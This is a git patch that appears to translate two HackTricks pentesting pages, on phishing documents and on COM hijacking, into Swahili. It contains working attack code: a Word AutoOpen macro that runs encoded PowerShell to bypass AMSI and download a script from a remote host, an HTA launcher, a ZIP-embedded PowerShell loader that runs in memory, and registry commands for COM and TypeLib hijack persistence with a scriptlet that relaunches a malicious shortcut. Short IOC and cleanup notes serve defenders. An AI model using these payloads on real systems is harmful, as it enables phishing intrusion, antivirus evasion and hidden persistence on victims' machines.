From d1109cd1ee3860dcfc754664c340555918ab437e Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Thu, 28 Aug 2025 22:49:47 +0000
Subject: [PATCH] Translated
 ['src/generic-methodologies-and-resources/phishing-methodolog

---
 .../phishing-documents.md                     | 109 +++++++++++++-----
 .../com-hijacking.md                          |  72 ++++++++++--
 2 files changed, 145 insertions(+), 36 deletions(-)

diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
index c5ce42351..60594d8fb 100644
--- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
@@ -1,40 +1,40 @@
-# Phishing Files & Documents
+# Faili na Nyaraka za Phishing
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Office Documents
+## Nyaraka za Office
 
-Microsoft Word hufanya uthibitisho wa data za faili kabla ya kufungua faili. Uthibitisho wa data unafanywa kwa njia ya utambuzi wa muundo wa data, dhidi ya kiwango cha OfficeOpenXML. Ikiwa hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochambuliwa haitafunguliwa.
+Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiki wa data hufanywa kwa njia ya utambuzi wa muundo wa data, kwa mujibu wa kiwango cha OfficeOpenXML. Ikiwa kosa lolote litatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
 
-Kwa kawaida, faili za Word zinazokuwa na macros hutumia kiambishi cha `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha kiambishi cha faili na bado kuhifadhi uwezo wao wa kutekeleza macros.\
-Kwa mfano, faili ya RTF haisaidii macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\
-Mifumo na mitambo sawa inatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint n.k.).
+Kwa kawaida, faili za Word zinazobeba macros hutumia extension ya `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha extension ya faili na bado kuhifadhi uwezo wake wa kutekeleza macros.\
+Kwa mfano, faili ya RTF haiungi mkono macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\
+Mifumo ya ndani na taratibu sawa zinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint n.k.).
 
-Unaweza kutumia amri ifuatayo kuangalia ni kiambishi gani kitakachotekelezwa na baadhi ya programu za Office:
+Unaweza kutumia amri ifuatayo kuangalia ni zipi extensions zitakazotekelezwa na baadhi ya programu za Office:
 ```bash
 assoc | findstr /i "word excel powerp"
 ```
-DOCX faili zinazorejelea templeti ya mbali (File –Options –Add-ins –Manage: Templates –Go) ambayo inajumuisha macros zinaweza "kutekeleza" macros pia.
+Faili za DOCX zinazorejelea template ya mbali (File –Options –Add-ins –Manage: Templates –Go) ambazo zinajumuisha macros zinaweza pia “kutekeleza” macros.
 
-### Upakuaji wa Picha za Nje
+### Kupakia Picha za Nje
 
 Nenda kwa: _Insert --> Quick Parts --> Field_\
-_**Categories**: Links and References, **Filed names**: includePicture, na **Filename or URL**:_ http://\<ip>/whatever
+_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://<ip>/whatever
 
 ![](<../../images/image (155).png>)
 
-### Backdoor za Macros
+### Macros Backdoor
 
-Inawezekana kutumia macros kuendesha msimbo wowote kutoka kwa hati.
+Inawezekana kutumia macros kuendesha arbitrary code kutoka kwenye document.
 
-#### Kazi za Autoload
+#### Autoload functions
 
-Kadri zinavyokuwa za kawaida, ndivyo uwezekano wa AV kuzitambua unavyoongezeka.
+Kadri zinavyokuwa za kawaida zaidi, ndivyo AV inavyoweza kuzitambua.
 
 - AutoOpen()
 - Document_Open()
 
-#### Mifano ya Msimbo wa Macros
+#### Macros Code Examples
 ```vba
 Sub AutoOpen()
 CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
@@ -64,16 +64,16 @@ Dim proc As Object
 Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
 proc.Create "powershell <beacon line generated>
 ```
-#### Ondoa metadata kwa mikono
+#### Ondoa metadata kwa mkono
 
-Nenda kwenye **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
+Nenda kwa **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
 
-#### Upanuzi wa Doc
+#### Extension ya Doc
 
-Unapomaliza, chagua **Save as type** dropdown, badilisha muundo kutoka **`.docx`** hadi **Word 97-2003 `.doc`**.\
-Fanya hivi kwa sababu huwezi **kuhifadhi macro ndani ya `.docx`** na kuna **stigma** **kuhusu** upanuzi wa macro-enabled **`.docm`** (kwa mfano, ikoni ya thumbnail ina `!` kubwa na baadhi ya lango la wavuti/barua pepe linaweza kuzuia kabisa). Hivyo, upanuzi huu wa zamani wa `.doc` ni **mkataba bora**.
+Ukimaliza, chagua dropdown ya **Save as type**, badilisha muundo kutoka **`.docx`** hadi **Word 97-2003 `.doc`**.\
+Fanya hivyo kwa sababu **huwezi kuhifadhi macro's ndani ya `.docx`** na kuna **stigma** kuhusu ugani unaowezesha macro **`.docm`** (kwa mfano, icon ya thumbnail ina `!` kubwa na baadhi ya gateway za wavuti/baruapepe huvizuia kabisa). Kwa hiyo, **ugani wa kale `.doc` ndio suluhisho bora**.
 
-#### Watengenezaji wa Macros Mbaya
+#### Vyanzo vya Malicious Macros
 
 - MacOS
 - [**macphish**](https://github.com/cldrn/macphish)
@@ -81,9 +81,9 @@ Fanya hivi kwa sababu huwezi **kuhifadhi macro ndani ya `.docx`** na kuna **stig
 
 ## Faili za HTA
 
-HTA ni programu ya Windows ambayo **inaunganisha HTML na lugha za skripti (kama VBScript na JScript)**. Inaunda kiolesura cha mtumiaji na inatekelezwa kama programu "iliyokubaliwa kikamilifu", bila vizuizi vya mfano wa usalama wa kivinjari.
+HTA ni programu ya Windows inayochanganya **HTML na lugha za scripting (k.m. VBScript na JScript)**. Inaunda kiolesura cha mtumiaji na inaendeshwa kama programu "iliyothibitishwa kabisa", bila vikwazo vya mfano wa usalama wa kivinjari.
 
-HTA inatekelezwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imewekwa** pamoja na **Internet Explorer**, ikifanya **`mshta` kuwa tegemezi kwa IE**. Hivyo ikiwa imeondolewa, HTAs hazitaweza kutekelezwa.
+HTA inaenzishwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imesakinishwa** pamoja na **Internet Explorer**, na kufanya **`mshta` inategemea IE**. Kwa hivyo ikiwa imeondolewa, HTA hazitaweza kutekelezwa.
 ```html
 <--! Basic HTA Execution -->
 <html>
@@ -138,11 +138,11 @@ var_func
 self.close
 </script>
 ```
-## Kulazimisha Uthibitisho wa NTLM
+## Kulazimisha NTLM Authentication
 
-Kuna njia kadhaa za **kulazimisha uthibitisho wa NTLM "kijijini"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atafikia (hata HTTP MitM?). Au tumia mwathirika **anwani ya faili** ambazo zita **anzisha** **uthibitisho** tu kwa **kufungua folda.**
+Kuna njia kadhaa za **kulazimisha NTLM authentication "kwa mbali"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atazifungua (hata HTTP MitM?). Au mtumie mwathiriwa **anwani ya faili** zitakazowasababisha **authentication** tu kwa **ufunguaji wa folda.**
 
-**Angalia mawazo haya na mengine kwenye kurasa zifuatazo:**
+**Tazama mawazo haya na zaidi kwenye kurasa zifuatazo:**
 
 
 {{#ref}}
@@ -156,9 +156,60 @@ Kuna njia kadhaa za **kulazimisha uthibitisho wa NTLM "kijijini"**, kwa mfano, u
 
 ### NTLM Relay
 
-Usisahau kwamba huwezi tu kuiba hash au uthibitisho bali pia **fanya mashambulizi ya NTLM relay**:
+Usisahau kwamba huwezi kuiba tu hash au authentication pekee, bali pia unaweza **perform NTLM relay attacks**:
 
-- [**Mashambulizi ya NTLM Relay**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
-- [**AD CS ESC8 (NTLM relay kwa vyeti)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
+- [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
+- [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
+
+## LNK Loaders + ZIP-Embedded Payloads (fileless chain)
+
+Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha nyaraka mbili halali za kupotosha (PDF/DOCX) na .lnk hatari. Mbinu ni kwamba loader halisi ya PowerShell imehifadhiwa ndani ya bytes ghafi za ZIP baada ya alama ya kipekee, na .lnk huitaibua na kuiendesha kabisa kwenye kumbukumbu.
+
+Mtiririko wa kawaida unaotekelezwa na .lnk PowerShell one-liner:
+
+1) Tambua ZIP ya asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na folda mzazi ya current working directory.
+2) Soma bytes za ZIP na utafute marker uliowekwa kwenye msimbo (mfano, xFIQCV). Yote yanayofuata marker ni PowerShell payload iliyojazwa ndani.
+3) Nakili ZIP hadi %ProgramData%, itolee hapo (extract), kisha fungua .docx ya kupotosha ili ionekane halali.
+4) Bypass AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
+5) Deobfuscate hatua inayofuata (kwa mfano, ondoa tabia zote za #) na uitekeleze kwenye kumbukumbu.
+
+Mfano wa skeleton ya PowerShell ili kuibua na kuendesha hatua iliyojazwa ndani:
+```powershell
+$marker   = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
+$paths    = @(
+"$env:USERPROFILE\Desktop", "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Documents",
+"$env:TEMP", "$env:ProgramData", (Get-Location).Path, (Get-Item '..').FullName
+)
+$zip = Get-ChildItem -Path $paths -Filter *.zip -ErrorAction SilentlyContinue -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -First 1
+if(-not $zip){ return }
+$bytes = [IO.File]::ReadAllBytes($zip.FullName)
+$idx   = [System.MemoryExtensions]::IndexOf($bytes, $marker)
+if($idx -lt 0){ return }
+$stage = $bytes[($idx + $marker.Length) .. ($bytes.Length-1)]
+$code  = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
+[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+Invoke-Expression $code
+```
+Notes
+- Usambazaji mara nyingi unatumia vibamba vya subdomain vya PaaS vinavyoaminika (e.g., *.herokuapp.com) na unaweza gate payloads (kutumia ZIP zisizo hatari kulingana na IP/UA).
+- Hatua inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuiendesha kupitia Reflection.Emit + VirtualAlloc ili kupunguza athari za diski.
+
+Persistence used in the same chain
+- COM TypeLib hijacking of the Microsoft Web Browser control ili IE/Explorer au programu yoyote inayoiingiza ianze upya payload kiotomatiki. See details and ready-to-use commands here:
+
+{{#ref}}
+../../windows-hardening/windows-local-privilege-escalation/com-hijacking.md
+{{#endref}}
+
+Hunting/IOCs
+- ZIP files zenye kamba ya alama ya ASCII (e.g., xFIQCV) iliyoongezwa kwenye data ya archive.
+- .lnk inayoorodhesha folda za mzazi/mtumiaji ili kupata ZIP na kufungua nyaraka ya kudanganya.
+- Kuchezewa kwa AMSI kupitia [System.Management.Automation.AmsiUtils]::amsiInitFailed.
+- Nyuzi za biashara zinazodumu muda mrefu zikimalizika kwa viungo vinavyoandikwa chini ya vikoa vya PaaS vinavyoaminika.
+
+## References
+
+- [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
+- [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
index a406c4f85..9e4e83919 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
@@ -2,15 +2,15 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-### Kutafuta sehemu za COM zisizopo
+### Kutafuta vipengele vya COM visivyopo
 
-Kwa kuwa thamani za HKCU zinaweza kubadilishwa na watumiaji, **COM Hijacking** inaweza kutumika kama **mekanismu ya kudumu**. Kwa kutumia `procmon` ni rahisi kupata rejista za COM zilizotafutwa ambazo hazipo ambazo mshambuliaji anaweza kuunda ili kudumu. Filters:
+Kama thamani za HKCU zinaweza kubadilishwa na watumiaji, **COM Hijacking** inaweza kutumika kama **mbinu za kudumu**. Kutumia `procmon` ni rahisi kupata rejista za COM zilizoombwa ambazo hazipo na ambazo mshambuliaji anaweza kuziunda ili kudumu. Vichujio:
 
 - **RegOpenKey** operations.
 - ambapo _Result_ ni **NAME NOT FOUND**.
 - na _Path_ inamalizika na **InprocServer32**.
 
-Mara tu unapokuwa umeamua ni COM ipi isiyopo unayotaka kuiga, tekeleza amri zifuatazo. _Kuwa makini ikiwa unataka kuiga COM inayopakuliwa kila sekunde chache kwani hiyo inaweza kuwa kupita kiasi._
+Mara uamapoamua ni COM gani isiyokuwepo kuigiza, tekeleza amri zifuatazo. _Angalia kwa uangalifu ikiwa utaamua kuiga COM ambayo inapakiwa kila sekunde chache kwani hiyo inaweza kuwa ya kupitiliza._
 ```bash
 New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
 New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
@@ -18,7 +18,7 @@ New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F
 ```
 ### Hijackable Task Scheduler COM components
 
-Windows Tasks hutumia Custom Triggers kuita COM objects na kwa sababu zinafanywa kupitia Task Scheduler, ni rahisi kutabiri wakati zitakapoitwa.
+Windows Tasks zinatumia Custom Triggers kuita COM objects, na kwa sababu zinaendeshwa kupitia Task Scheduler, ni rahisi kutabiri lini zitaanzishwa.
 
 <pre class="language-powershell"><code class="lang-powershell"># Show COM CLSIDs
 $Tasks = Get-ScheduledTask
@@ -49,9 +49,9 @@ Write-Host
 # CLSID:  {1936ED8A-BD93-3213-E325-F38D112938E1}
 # [more like the previous one...]</code></pre>
 
-Kuangalia matokeo unaweza kuchagua moja ambayo itatekelezwa **kila wakati mtumiaji anapoingia** kwa mfano.
+Ukikagua matokeo unaweza kuchagua moja ambayo itaendeshwa **kila wakati mtumiaji anapoingia** kwa mfano.
 
-Sasa kutafuta CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** katika **HKEY\CLASSES\ROOT\CLSID** na katika HKLM na HKCU, kwa kawaida utaona kwamba thamani hiyo haipo katika HKCU.
+Sasa unapochunguza CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** katika **HKEY\CLASSES\ROOT\CLSID** na katika HKLM na HKCU, kawaida utagundua kwamba thamani haipo katika HKCU.
 ```bash
 # Exists in HKCR\CLSID\
 Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
@@ -72,6 +72,64 @@ Name                                   Property
 PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
 Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
 ```
-Kisha, unaweza tu kuunda kiingilio cha HKCU na kila wakati mtumiaji anapoingia, nyuma yako itawashwa.
+Kisha, unaweza tu kuunda kiingilio cha HKCU na kila mtumiaji anapoingia, backdoor yako itaanzishwa.
+
+---
+
+## COM TypeLib Hijacking (script: moniker persistence)
+
+Type Libraries (TypeLib) zinaelezea COM interfaces na zinaingizwa kupitia `LoadTypeLib()`. Wakati COM server inapoanzishwa, OS pia inaweza kuingiza TypeLib inayohusiana kwa kushauriana na funguo za rejista chini ya `HKCR\TypeLib\{LIBID}`. Ikiwa njia ya TypeLib itabadilishwa na **moniker**, mfano `script:C:\...\evil.sct`, Windows itatekeleza scriptlet wakati TypeLib inapogunduliwa — na kusababisha persistence ya kimyakimya inayochochewa wakati vipengele vya kawaida vinapoguswa.
+
+Hii imeonekana dhidi ya Microsoft Web Browser control (inayoingizwa mara kwa mara na Internet Explorer, programu zinazojumuisha WebBrowser, na hata `explorer.exe`).
+
+### Hatua (PowerShell)
+
+1) Tambua TypeLib (LIBID) inayotumiwa na CLSID inayotumika mara kwa mara. Mfano wa CLSID unaotumika mara nyingi na minyororo ya malware: {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B} (Microsoft Web Browser).
+```powershell
+$clsid = '{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}'
+$libid = (Get-ItemProperty -Path "Registry::HKCR\\CLSID\\$clsid\\TypeLib").'(default)'
+$ver   = (Get-ChildItem "Registry::HKCR\\TypeLib\\$libid" | Select-Object -First 1).PSChildName
+"CLSID=$clsid  LIBID=$libid  VER=$ver"
+```
+2) Elekeza njia ya TypeLib ya mtumiaji mmoja kwa scriptlet ya ndani ukitumia moniker `script:` (no admin rights required):
+```powershell
+$dest = 'C:\\ProgramData\\Udate_Srv.sct'
+New-Item -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Force | Out-Null
+Set-ItemProperty -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Name '(default)' -Value "script:$dest"
+```
+3) Drop JScript `.sct` ndogo kabisa inayowasha tena primary payload yako (kwa mfano `.lnk` inayotumiwa na initial chain):
+```xml
+<?xml version="1.0"?>
+<scriptlet>
+<registration progid="UpdateSrv" classid="{F0001111-0000-0000-0000-0000F00D0001}" description="UpdateSrv"/>
+<script language="JScript">
+<![CDATA[
+try {
+var sh = new ActiveXObject('WScript.Shell');
+// Re-launch the malicious LNK for persistence
+var cmd = 'cmd.exe /K set X=1&"C:\\ProgramData\\NDA\\NDA.lnk"';
+sh.Run(cmd, 0, false);
+} catch(e) {}
+]]>
+</script>
+</scriptlet>
+```
+4) Kuchochea – kufungua IE, programu inayojumuisha WebBrowser control, au hata shughuli za kawaida za Explorer zitapakia TypeLib na kutekeleza scriptlet, zikirejesha mnyororo wako wakati wa logon/reboot.
+
+Usafishaji
+```powershell
+# Remove the per-user TypeLib hijack
+Remove-Item -Recurse -Force "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver" 2>$null
+# Delete the dropped scriptlet
+Remove-Item -Force 'C:\\ProgramData\\Udate_Srv.sct' 2>$null
+```
+Vidokezo
+- Unaweza kutumia mantiki ile ile kwa COM components nyingine zinazotumika mara kwa mara; daima pata `LIBID` halisi kutoka `HKCR\CLSID\{CLSID}\TypeLib` kwanza.
+- Kwenye mifumo ya 64-bit unaweza pia kujaza subkey ya `win64` kwa watumiaji wa 64-bit.
+
+## Marejeo
+
+- [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
+- [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
 
 {{#include ../../banners/hacktricks-training.md}}